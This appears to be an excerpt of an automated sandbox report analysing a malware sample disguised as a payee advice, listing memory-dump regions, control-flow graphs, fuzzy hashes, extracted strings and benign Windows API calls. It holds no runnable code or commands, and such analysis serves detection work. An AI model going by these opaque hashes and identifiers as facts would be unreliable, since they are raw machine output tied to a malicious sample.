                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ea1be1728722717fdc8824b59a94d1d3973882b5f39400849009ab00ff8b0d60
                                                                                                                                          • Instruction ID: f03d8e94ff3e12775aaf1990defb5d3e905444921f6c1e197376a41cd0ae2e67
                                                                                                                                          • Opcode Fuzzy Hash: ea1be1728722717fdc8824b59a94d1d3973882b5f39400849009ab00ff8b0d60
                                                                                                                                          • Instruction Fuzzy Hash: 7D41F4B0E002188BEB18DFAAC8447DDBBF2BF89304F14C16AC419BB294DB35594ACF14
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e8a5f00ad68e9efd6f5b29692ac24a3c227d95277ce8f67122e1df7ff2546c22
                                                                                                                                          • Instruction ID: 65dc324598ec7fb1dc34c0a829019a7f8ac44250edc1ba4b7c6152ebad6199d4
                                                                                                                                          • Opcode Fuzzy Hash: e8a5f00ad68e9efd6f5b29692ac24a3c227d95277ce8f67122e1df7ff2546c22
                                                                                                                                          • Instruction Fuzzy Hash: 6A416971E016189BEB58CF6BC94479EFAF3AFC9304F14C1AAC40CA6264EB751A85CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353627350.000000003A810000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A810000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a810000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 84ca72c980d2ba16840638f9b3bf56e02c270803037ea3bcea6beb6211e21b43
                                                                                                                                          • Instruction ID: cf218533518f4b283509afcc4f9fa08f3891e12c6acf93b60097f890c9757603
                                                                                                                                          • Opcode Fuzzy Hash: 84ca72c980d2ba16840638f9b3bf56e02c270803037ea3bcea6beb6211e21b43
                                                                                                                                          • Instruction Fuzzy Hash: 4E410570E042188FDB08DFAAD8946DDBBF2BF89300F24D02AD458BB254EB345946CF41
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 39d8ce8f863f0e0b6c58862c87d07e16aa5194edc9bd55cb53ed12a95761cb7c
                                                                                                                                          • Instruction ID: 6780d9c2ad500c355775849494e9c1f7f89497e86493c818901155ee1898d8c1
                                                                                                                                          • Opcode Fuzzy Hash: 39d8ce8f863f0e0b6c58862c87d07e16aa5194edc9bd55cb53ed12a95761cb7c
                                                                                                                                          • Instruction Fuzzy Hash: CA41F274D01648CFEB18DFAAC9546EDBBB2BF89300F20C12AD419AB364DB355946CF40
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 12ee1aa6e6e675e7607ff8d91034c92e70001e04d7e001986432e668740ad467
                                                                                                                                          • Instruction ID: 4a5d656d3749fc2e8114928ad261b12888fa16aec95e84e7f1ca9b57e3ee1f7b
                                                                                                                                          • Opcode Fuzzy Hash: 12ee1aa6e6e675e7607ff8d91034c92e70001e04d7e001986432e668740ad467
                                                                                                                                          • Instruction Fuzzy Hash: A541C271D01248CBEB08DFEAD94469DBBF2AF89300F20D12AC419BB255DB355945CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 30eecc464347e80af53f23295083512cbff0334a6dfdf2d27887036660e9bcf6
                                                                                                                                          • Instruction ID: efaf6d3bca2274a64228bd47bc8fa0f7803b2b340690f88fe2d046fe88391052
                                                                                                                                          • Opcode Fuzzy Hash: 30eecc464347e80af53f23295083512cbff0334a6dfdf2d27887036660e9bcf6
                                                                                                                                          • Instruction Fuzzy Hash: 1141D274E01248CBEB18DFAAD9546DDFBF2AF89300F20D12AC419BB255DB355946CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 35a0d1b5d53e83f43022369f5c4fcc6de76a8c8a056ea87a8af7bbc9d93b924e
                                                                                                                                          • Instruction ID: 703a38e4e05c732b61601772e9bd5c26c4334085f7afc4be70bb2d35144437b0
                                                                                                                                          • Opcode Fuzzy Hash: 35a0d1b5d53e83f43022369f5c4fcc6de76a8c8a056ea87a8af7bbc9d93b924e
                                                                                                                                          • Instruction Fuzzy Hash: 7131D270E01608CBEB08CFAAC5546DDFBB2AF89300F21D12AC419BB255EB355946CF40

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 522 1676f1-167725 523 167b54-167b58 522->523 524 16772b-16774e 522->524 525 167b71-167b7f 523->525 526 167b5a-167b6e 523->526 533 167754-167761 524->533 534 1677fc-167800 524->534 531 167bf0-167c05 525->531 532 167b81-167b96 525->532 540 167c07-167c0a 531->540 541 167c0c-167c19 531->541 542 167b9d-167baa 532->542 543 167b98-167b9b 532->543 547 167763-16776e 533->547 548 167770 533->548 537 167802-167810 534->537 538 167848-167851 534->538 537->538 552 167812-16782d 537->552 544 167c67 538->544 545 167857-167861 538->545 549 167c1b-167c56 540->549 541->549 550 167bac-167bed 542->550 543->550 553 167c6c-167c85 544->553 545->523 551 167867-167870 545->551 554 167772-167774 547->554 548->554 593 167c5d-167c64 549->593 557 167872-167877 551->557 558 16787f-16788b 551->558 577 16782f-167839 552->577 578 16783b 552->578 554->534 561 16777a-1677dc 554->561 557->558 558->553 559 167891-167897 558->559 565 167b3e-167b42 559->565 566 16789d-1678ad 559->566 606 1677e2-1677f9 561->606 607 1677de 561->607 565->544 570 167b48-167b4e 565->570 579 1678c1-1678c3 566->579 580 1678af-1678bf 566->580 570->523 570->551 581 16783d-16783f 577->581 578->581 582 1678c6-1678cc 579->582 580->582 581->538 588 167841 581->588 582->565 589 1678d2-1678e1 582->589 588->538 590 1678e7 589->590 591 16798f-1679ba call 167538 * 2 589->591 595 1678ea-1678fb 590->595 608 167aa4-167abe 591->608 609 1679c0-1679c4 591->609 595->553 597 167901-167913 595->597 597->553 600 167919-167933 call 1680d8 597->600 602 167939-167949 600->602 602->565 605 16794f-167952 602->605 610 167954-16795a 605->610 611 16795c-16795f 605->611 606->534 607->606 608->523 629 167ac4-167ac8 608->629 609->565 612 1679ca-1679ce 609->612 610->611 613 167965-167968 610->613 611->544 611->613 616 1679f6-1679fc 612->616 617 1679d0-1679dd 612->617 618 167970-167973 613->618 619 16796a-16796e 613->619 621 167a37-167a3d 616->621 622 1679fe-167a02 616->622 632 1679df-1679ea 617->632 633 1679ec 617->633 618->544 620 167979-16797d 618->620 619->618 619->620 620->544 627 167983-167989 620->627 624 167a3f-167a43 621->624 625 167a49-167a4f 621->625 622->621 628 167a04-167a0d 622->628 624->593 624->625 630 167a51-167a55 625->630 631 167a5b-167a5d 625->631 627->591 627->595 634 167a0f-167a14 628->634 635 167a1c-167a32 628->635 636 167b04-167b08 629->636 637 167aca-167ad4 call 1663e0 629->637 630->565 630->631 638 167a92-167a94 631->638 639 167a5f-167a68 631->639 640 1679ee-1679f0 632->640 633->640 634->635 635->565 636->593 642 167b0e-167b12 636->642 637->636 650 167ad6-167aeb 637->650 638->565 647 167a9a-167aa1 638->647 645 167a77-167a8d 639->645 646 167a6a-167a6f 639->646 640->565 640->616 642->593 648 167b18-167b25 642->648 645->565 646->645 653 167b27-167b32 648->653 654 167b34 648->654 650->636 659 167aed-167b02 650->659 656 167b36-167b38 653->656 654->656 656->565 656->593 659->523 659->636
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                                                                                                          • API String ID: 0-1435242062
                                                                                                                                          • Opcode ID: 6aaa1687f70607c67b1625478deb09547182abdce34c6719bb1caeab3ad4a609
                                                                                                                                          • Instruction ID: 9331622d72e6b5f2643a6d0c2790827b90766f26f7100cecd8dbb58ef87c6ac0
                                                                                                                                          • Opcode Fuzzy Hash: 6aaa1687f70607c67b1625478deb09547182abdce34c6719bb1caeab3ad4a609
                                                                                                                                          • Instruction Fuzzy Hash: 5C125B30A04609CFCB15CF68C894AAEBBF2FF49318F258599E855DB2A1D730ED51CB90

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1212 39ef3a50-39ef3a97 1216 39ef3a9d-39ef3a9f 1212->1216 1217 39ef3c73-39ef3c7e 1212->1217 1218 39ef3c85-39ef3c90 1216->1218 1219 39ef3aa5-39ef3aa9 1216->1219 1217->1218 1224 39ef3c97-39ef3ca2 1218->1224 1219->1218 1220 39ef3aaf-39ef3ae7 1219->1220 1220->1224 1232 39ef3aed-39ef3af1 1220->1232 1228 39ef3ca9-39ef3cb4 1224->1228 1233 39ef3cbb-39ef3ce7 1228->1233 1234 39ef3afd-39ef3b01 1232->1234 1235 39ef3af3-39ef3af7 1232->1235 1268 39ef3cee-39ef3d1a 1233->1268 1236 39ef3b0c-39ef3b10 1234->1236 1237 39ef3b03-39ef3b0a 1234->1237 1235->1228 1235->1234 1239 39ef3b28-39ef3b2c 1236->1239 1240 39ef3b12-39ef3b16 1236->1240 1237->1239 1243 39ef3b2e-39ef3b30 1239->1243 1244 39ef3b33-39ef3b3a 1239->1244 1241 39ef3b18-39ef3b1f 1240->1241 1242 39ef3b21 1240->1242 1241->1239 1242->1239 1243->1244 1246 39ef3b3c 1244->1246 1247 39ef3b43-39ef3b47 1244->1247 1246->1247 1249 39ef3bf8-39ef3bfb 1246->1249 1250 39ef3b96-39ef3b99 1246->1250 1251 39ef3bc5-39ef3bc8 1246->1251 1252 39ef3c61-39ef3c6c 1246->1252 1253 39ef3b4d-39ef3b51 1247->1253 1254 39ef3c26-39ef3c29 1247->1254 1260 39ef3bfd 1249->1260 1261 39ef3c02-39ef3c21 1249->1261 1262 39ef3b9b-39ef3b9e 1250->1262 1263 39ef3ba4-39ef3bc3 1250->1263 1258 39ef3bca-39ef3bcd 1251->1258 1259 39ef3bd3-39ef3bf6 1251->1259 1252->1217 1253->1252 1255 39ef3b57-39ef3b5a 1253->1255 1256 39ef3c2b-39ef3c2e 1254->1256 1257 39ef3c39-39ef3c5c 1254->1257 1264 39ef3b5c 1255->1264 1265 39ef3b61-39ef3b7d 1255->1265 1256->1257 1266 39ef3c30-39ef3c33 1256->1266 1282 39ef3b7f-39ef3b83 1257->1282 1258->1259 1258->1268 1259->1282 1260->1261 1261->1282 1262->1233 1262->1263 1263->1282 1264->1265 1265->1282 1266->1257 1270 39ef3d21-39ef3d93 1266->1270 1268->1270 1294 39ef3df5-39ef3e59 1270->1294 1295 39ef3d95-39ef3d98 1270->1295 1317 39ef3b86 call 39ef3fe8 1282->1317 1318 39ef3b86 call 39ef4088 1282->1318 1319 39ef3b86 call 39ef3fd7 1282->1319 1286 39ef3b8c-39ef3b93 1312 39ef3e5b-39ef3e60 1294->1312 1313 39ef3e62-39ef3e72 1294->1313 1295->1294 1296 39ef3d9a-39ef3da9 1295->1296 1299 39ef3dab-39ef3db1 1296->1299 1300 39ef3dc1-39ef3dc5 1296->1300 1302 39ef3db5-39ef3db7 1299->1302 1303 39ef3db3 1299->1303 1304 39ef3ded-39ef3df4 1300->1304 1305 39ef3dc7-39ef3de7 1300->1305 1302->1300 1303->1300 1305->1304 1314 39ef3e77-39ef3e78 1312->1314 1313->1314 1317->1286 1318->1286 1319->1286
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: $Haq$Haq$Haq$x4n9$x4n9
                                                                                                                                          • API String ID: 0-3301092701
                                                                                                                                          • Opcode ID: 7d681777ef10f74ade8a9c6301d5ee1a056a695d4ce98858f3f877ffcfc944ea
                                                                                                                                          • Instruction ID: 98ec93ec58a27f654769e94a489841168add69afd1ae8f94d717d3170d682041
                                                                                                                                          • Opcode Fuzzy Hash: 7d681777ef10f74ade8a9c6301d5ee1a056a695d4ce98858f3f877ffcfc944ea
                                                                                                                                          • Instruction Fuzzy Hash: 3AA1EF34B002449FDB15AF38986566E3BA6EFC53A4B21462AE413CB3D1CF369D41CBA1

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1320 39ef3fe8-39ef3ff1 1321 39ef3ffa-39ef3ffd 1320->1321 1322 39ef3ff3-39ef3ff8 1320->1322 1324 39ef3fff-39ef4004 1321->1324 1325 39ef4006-39ef4009 1321->1325 1323 39ef4032-39ef4035 1322->1323 1324->1323 1326 39ef400b-39ef4010 1325->1326 1327 39ef4012-39ef4015 1325->1327 1326->1323 1328 39ef401e-39ef4021 1327->1328 1329 39ef4017-39ef401c 1327->1329 1330 39ef402a-39ef402d 1328->1330 1331 39ef4023-39ef4028 1328->1331 1329->1323 1332 39ef402f 1330->1332 1333 39ef4036-39ef40a6 1330->1333 1331->1323 1332->1323 1340 39ef40ab-39ef40ba call 39ef3f90 1333->1340 1343 39ef40bc-39ef40d7 1340->1343 1344 39ef4103-39ef4106 1340->1344 1343->1344 1357 39ef40d9-39ef40dd 1343->1357 1345 39ef411c-39ef414b 1344->1345 1346 39ef4108-39ef410e 1344->1346 1351 39ef414d-39ef4150 1345->1351 1352 39ef4157-39ef415d 1345->1352 1346->1340 1348 39ef4110 1346->1348 1349 39ef4112-39ef4119 1348->1349 1351->1352 1354 39ef4152-39ef4155 1351->1354 1355 39ef415f-39ef4162 1352->1355 1356 39ef4171-39ef41a5 1352->1356 1354->1352 1358 39ef41a8-39ef4200 1354->1358 1355->1356 1359 39ef4164-39ef4166 1355->1359 1360 39ef40df-39ef40e4 1357->1360 1361 39ef40e6-39ef40ef 1357->1361 1366 39ef4207-39ef4287 1358->1366 1359->1356 1362 39ef4168-39ef416b 1359->1362 1360->1349 1361->1344 1363 39ef40f1-39ef40fa 1361->1363 1362->1356 1362->1366 1363->1344 1367 39ef40fc-39ef4101 1363->1367 1385 39ef4289-39ef428d 1366->1385 1386 39ef42a7-39ef42fd 1366->1386 1367->1349 1423 39ef4290 call 39ef3fe8 1385->1423 1424 39ef4290 call 39ef4088 1385->1424 1425 39ef4290 call 39ef3fd7 1385->1425 1426 39ef4290 call 39ef4385 1385->1426 1427 39ef4290 call 39ef4351 1385->1427 1392 39ef42ff-39ef4306 1386->1392 1393 39ef4308-39ef4311 1386->1393 1387 39ef4293-39ef42a4 1394 39ef4323-39ef432c 1392->1394 1395 39ef431c 1393->1395 1396 39ef4313-39ef431a 1393->1396 1397 39ef4332-39ef434f 1394->1397 1398 39ef43c0-39ef43c7 call 39ef44cf 1394->1398 1395->1394 1396->1394 1400 39ef43cd-39ef43e9 1397->1400 1398->1400 1403 39ef43eb-39ef43ee 1400->1403 1404 39ef43f0-39ef444a 1400->1404 1403->1404 1405 39ef4452-39ef445b 1403->1405 1404->1405 1406 39ef445d-39ef4460 1405->1406 1407 39ef4462-39ef4498 1405->1407 1406->1407 1409 39ef44c7-39ef44cd 1406->1409 1407->1409 1418 39ef449a-39ef44bf 1407->1418 1418->1409 1423->1387 1424->1387 1425->1387 1426->1387 1427->1387
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: 8bq$Haq$Haq$Haq$TJbq
                                                                                                                                          • API String ID: 0-1597716666
                                                                                                                                          • Opcode ID: 505137aa2e37902d6d7298dfcc337eef96a126340c73d4deb2ea945045cb5059
                                                                                                                                          • Instruction ID: 4fdcc6bfb33522f7a4c2a99c8372b3515a1a32702c50105423e777061c2ab49d
                                                                                                                                          • Opcode Fuzzy Hash: 505137aa2e37902d6d7298dfcc337eef96a126340c73d4deb2ea945045cb5059
                                                                                                                                          • Instruction Fuzzy Hash: 4ED11535B082448FD705DB68C894AAD7BB2FFC9320F25416AE506DB3A1DB31ED81CB91

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1758 3a99b42a-3a99b435 1759 3a99b427 1758->1759 1760 3a99b437-3a99b4c7 GetCurrentProcess 1758->1760 1759->1758 1764 3a99b4c9-3a99b4cf 1760->1764 1765 3a99b4d0-3a99b504 GetCurrentThread 1760->1765 1764->1765 1766 3a99b50d-3a99b541 GetCurrentProcess 1765->1766 1767 3a99b506-3a99b50c 1765->1767 1768 3a99b54a-3a99b565 call 3a99b609 1766->1768 1769 3a99b543-3a99b549 1766->1769 1767->1766 1773 3a99b56b-3a99b59a GetCurrentThreadId 1768->1773 1769->1768 1774 3a99b59c-3a99b5a2 1773->1774 1775 3a99b5a3-3a99b605 1773->1775 1774->1775
                                                                                                                                          APIs
                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 3A99B4B6
                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 3A99B4F3
                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 3A99B530
                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 3A99B589
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353733702.000000003A990000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A990000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a990000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                          • Opcode ID: 7174bc464c88ebec1e455478c37fe149d4fb5aa5a3e458106ef19bf405937340
                                                                                                                                          • Instruction ID: 1826be207f24cf416748a50fe48ac686815026b6b184ee05c916608947c97910
                                                                                                                                          • Opcode Fuzzy Hash: 7174bc464c88ebec1e455478c37fe149d4fb5aa5a3e458106ef19bf405937340
                                                                                                                                          • Instruction Fuzzy Hash: 035166B09003499FDB01CFA9D548BEEBFF1AF89310F20849DE459B7251DB396981CB66

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1782 3a99b438-3a99b4c7 GetCurrentProcess 1786 3a99b4c9-3a99b4cf 1782->1786 1787 3a99b4d0-3a99b504 GetCurrentThread 1782->1787 1786->1787 1788 3a99b50d-3a99b541 GetCurrentProcess 1787->1788 1789 3a99b506-3a99b50c 1787->1789 1790 3a99b54a-3a99b565 call 3a99b609 1788->1790 1791 3a99b543-3a99b549 1788->1791 1789->1788 1795 3a99b56b-3a99b59a GetCurrentThreadId 1790->1795 1791->1790 1796 3a99b59c-3a99b5a2 1795->1796 1797 3a99b5a3-3a99b605 1795->1797 1796->1797
                                                                                                                                          APIs
                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 3A99B4B6
                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 3A99B4F3
                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 3A99B530
                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 3A99B589
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353733702.000000003A990000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A990000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a990000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                          • Opcode ID: 73d0ca9b2d6be3ef75a51154e85d4b9b1dc51b990ff1a20ee1b4d73633de0ba3
                                                                                                                                          • Instruction ID: d73842c80fc12c699bcdeae648b819860d5c5c4830fd0956a3ab7b2e2d3590cd
                                                                                                                                          • Opcode Fuzzy Hash: 73d0ca9b2d6be3ef75a51154e85d4b9b1dc51b990ff1a20ee1b4d73633de0ba3
                                                                                                                                          • Instruction Fuzzy Hash: 395133B59003099FDB04DFA9D548BEEBFF5AF88310F20845DE419B7250DB39A981CB66
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Haq$Haq
                                                                                                                                          • API String ID: 0-4016896955
                                                                                                                                          • Opcode ID: 11fa73655926fa92400cf1244b62444bad865d207ef93bdc9d27e8b0521bbeb7
                                                                                                                                          • Instruction ID: 7db8399ff6b793e442ff90d48ac3d57ef7f6e21f93cb00a111a722b20c558ca6
                                                                                                                                          • Opcode Fuzzy Hash: 11fa73655926fa92400cf1244b62444bad865d207ef93bdc9d27e8b0521bbeb7
                                                                                                                                          • Instruction Fuzzy Hash: 14B1C0307042158FCB199F79CC64A7A7BA2AFC9300F15856AE446CB3A2DB34CD92D791
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: LR]q$LR]q
                                                                                                                                          • API String ID: 0-3917262905
                                                                                                                                          • Opcode ID: c79908d2cf2aaa17de540560952148263287d69614cf7237a78f628bc955649d
                                                                                                                                          • Instruction ID: 71acac825159e622ead996f676fb6e13cce00a313b4b1508f261c03e2db36516
                                                                                                                                          • Opcode Fuzzy Hash: c79908d2cf2aaa17de540560952148263287d69614cf7237a78f628bc955649d
                                                                                                                                          • Instruction Fuzzy Hash: 3581A234B14205AFD714DF78C865A5F7BB2BF89644B1541A9E44ADB3A1DB30EC02CF91
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: ,aq$,aq
                                                                                                                                          • API String ID: 0-2990736959
                                                                                                                                          • Opcode ID: 6634b1f007d13b867d61e60a1c926245d46ca4e21a187f36d04632bd4d8da44d
                                                                                                                                          • Instruction ID: bd9437d586553bd72f297243a438f1ee1a91a8a45c971755d408c4b3155379ee
                                                                                                                                          • Opcode Fuzzy Hash: 6634b1f007d13b867d61e60a1c926245d46ca4e21a187f36d04632bd4d8da44d
                                                                                                                                          • Instruction Fuzzy Hash: 6281BE74A00505CFCB18CF69DC8496ABBF2BF89315B258169D406E7379DB31EC61CBA1
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: (o]q$(o]q
                                                                                                                                          • API String ID: 0-1858875562
                                                                                                                                          • Opcode ID: d9dc8d33779aa59a453641811444f85ebdc87ed2005c7edd4776a4a978deeb82
                                                                                                                                          • Instruction ID: 283a3329aa3dafe66bbd1a3e59ab237f070db7db6fe3953fa28ab2563586c0c4
                                                                                                                                          • Opcode Fuzzy Hash: d9dc8d33779aa59a453641811444f85ebdc87ed2005c7edd4776a4a978deeb82
                                                                                                                                          • Instruction Fuzzy Hash: 8E4126357082048FC7059B78DC64A6E7FB2AFC9711B1444AAF506CB7A2DB31CD55CB91
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Xaq$Xaq
                                                                                                                                          • API String ID: 0-1488805882
                                                                                                                                          • Opcode ID: 37f34f395261b580f2390af5b1309bcf21fd7a94955880ccd8e4ecb0d1b88669
                                                                                                                                          • Instruction ID: a718e24fcf3dba5e90680a8bc9173e0fa2e2f72a44bafe72716ff65b9ac2d51d
                                                                                                                                          • Opcode Fuzzy Hash: 37f34f395261b580f2390af5b1309bcf21fd7a94955880ccd8e4ecb0d1b88669
                                                                                                                                          • Instruction Fuzzy Hash: DA316731B042258BDF2C4AF98C9427EAAE6AFC5300F68443ED822D3390DF74CE5593A0
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: 8bq$TJbq
                                                                                                                                          • API String ID: 0-3440557903
                                                                                                                                          • Opcode ID: 75740d48301154629239331aeb3ce3078353d91971545c7424842cebe2b5426c
                                                                                                                                          • Instruction ID: dc858eecc686cd0172de9b0cdc99e1510bc44f5d94a2a16f398bcd65e9bfb55d
                                                                                                                                          • Opcode Fuzzy Hash: 75740d48301154629239331aeb3ce3078353d91971545c7424842cebe2b5426c
                                                                                                                                          • Instruction Fuzzy Hash: 53313575B002098FCB45DBA8C491E9DBBB2FF88324F295951E505EB362DB31EC85CB90
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
